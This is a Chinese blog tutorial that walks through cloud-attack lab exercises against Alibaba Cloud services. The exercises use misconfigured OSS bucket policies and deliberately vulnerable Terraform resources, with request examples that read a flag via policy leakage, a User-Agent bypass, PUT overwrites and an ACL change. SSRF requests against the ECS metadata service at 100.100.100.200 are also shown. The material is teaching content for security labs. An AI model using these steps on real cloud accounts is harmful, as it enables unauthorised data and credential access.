【云安全】以Aliyun为例聊云厂商服务常见利用手段

目录

OSS-bucket_policy_readable

OSS-object_public_access

OSS-bucket_object_traversal

[OSS-Special Bucket Policy](#OSS-Special Bucket Policy)

OSS-unrestricted_file_upload

OSS-object_acl_writable

ECS-SSRF


云攻防场景下对云厂商服务的利用大同小异,下面以阿里云为例

其他如腾讯云、华为云、谷歌云、AWS、Azure不一一列举

OSS-bucket_policy_readable

桶策略可读

?policy可以看到存储桶策略

成功读到flag

OSS-object_public_access

对象公共访问

复制代码
resource "alicloud_oss_bucket_object" "huoxian_terraformgoat_object" {
  bucket     = alicloud_oss_bucket.huoxian_terraformgoat_bucket.bucket
  acl        = "public-read"
  key        = "flag"
  source     = "./flag"
  depends_on = [alicloud_oss_bucket.huoxian_terraformgoat_bucket]
}

访问./flag

OSS-bucket_object_traversal

存储桶对象遍历

复制代码
{
		"Effect": "Allow",
		"Action": [
			"oss:ListObjects",
			"oss:GetObject"
		],
		"Principal": [
			"*"
		],
		"Resource": [
			"acs:oss:*:*:*"
		],
		"Condition": {
			"StringLike": {
          		"oss:Prefix": [
					"*"
				]
			}
		}
	}

OSS-Special Bucket Policy

特殊存储桶策略

复制代码
{
		"Effect": "Allow",
		"Action": [
			"oss:ListObjects",
			"oss:GetObject"
		],
		"Principal": [
			"*"
		],
		"Resource": [
			"acs:oss:*:*:*"
		],
		"Condition": {
			"StringEquals": {
          		"acs:UserAgent": [
					"HxSecurityLab"
				]
			}
		}
	}

默认无权限访问

加上UA头

复制代码
User-Agent: HxSecurityLab

OSS-unrestricted_file_upload

不受限制的文件上传

复制代码
resource "alicloud_oss_bucket_object" "flag" {
  bucket       = alicloud_oss_bucket.Put_bucket_acl.bucket
  key          = "hx.png"
  source       = "./dist/hx.png"
  content_type = "inline"
  acl          = "public-read-write"
}

PUT覆盖原有文件

PUT新建文件

OSS-object_acl_writable

对象ACL可写

复制代码
{
	"Version": "1",
	"Statement": [{
		"Effect": "Allow",
		"Action": [
			"oss:GetObjectAcl",
			"oss:PutObjectAcl"
		],
		"Principal": [
			"*"
		],
		"Resource": [
			"acs:oss:*:*:*/*"
		]
	}]
}

直接访问flag.txt,403

查看acl

通过PUT方法将Object的ACL改为public-read

复制代码
PUT /flag.txt?acl HTTP/1.1
Host: hx-cloud-security-2rr50.oss-cn-beijing.aliyuncs.com
x-oss-object-acl: public-read

看到成功修改

成功读到flag

ECS-SSRF

用户可以通过 SSRF 漏洞获取到 ECS 上的元数据、用户数据等信息。

读取元数据

复制代码
http://100.100.100.200/latest/meta-data/

100.100.100.200 是一个特殊的保留 IP 地址,用于阿里云的元数据服务(Metadata Service)。它允许云服务器实例从内部网络获取自身的元数据,而无需访问外网。

读取用户数据

复制代码
http://100.100.100.200/latest/user-data/

User Data:用户在创建 ECS 时传入的脚本或配置

读flag

复制代码
file:///flag69152201.txt
相关推荐
白山云北诗3 小时前
企业网站网络安全防护方案
安全·web安全·网络安全·ddos防护·web应用防火墙·cc防护
FIT2CLOUD飞致云6 小时前
操作教程|JumpServer基于作业中心脚本定时删除Windows Server本地用户
运维·网络安全·开源·堡垒机
Bruce_Liuxiaowei8 小时前
工作组环境内部信息搜集:从基础查询到权限分析
网络·经验分享·网络安全
网安CILLE8 小时前
Linux 命令大全(网络安全常用)
linux·运维·服务器·网络安全
独角鲸网络安全实验室9 小时前
CVE-2025-61882深度分析:Oracle Concurrent Processing BI Publisher集成远程接管漏洞的技术原理与防御策略
数据库·网络安全·oracle·漏洞·ebs·cve-2025-61882·xml 注入
yesyesido9 小时前
高效安全局域网文件传输平台:零配置、高速度、跨设备的本地数据共享解决方案
安全·web安全·网络安全
小白勇闯网安圈11 小时前
[极客大挑战 2019]BabySQL、[极客大挑战 2019]PHP、[极客大挑战 2019]BuyFlag、[RoarCTF 2019]Easy Calc
网络安全·php
Whoami!11 小时前
❿⁄₄ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击 ➱ 密码破解理论(中)
网络安全·信息安全·密码破解·hastcat
竹等寒11 小时前
TryHackMe-SOC-Section 7:网络安全监控
web安全·网络安全
中科固源1 天前
面对快手式自动化突袭:如何堵住通讯协议的数字化命门?
安全·网络安全·通讯协议·模糊测试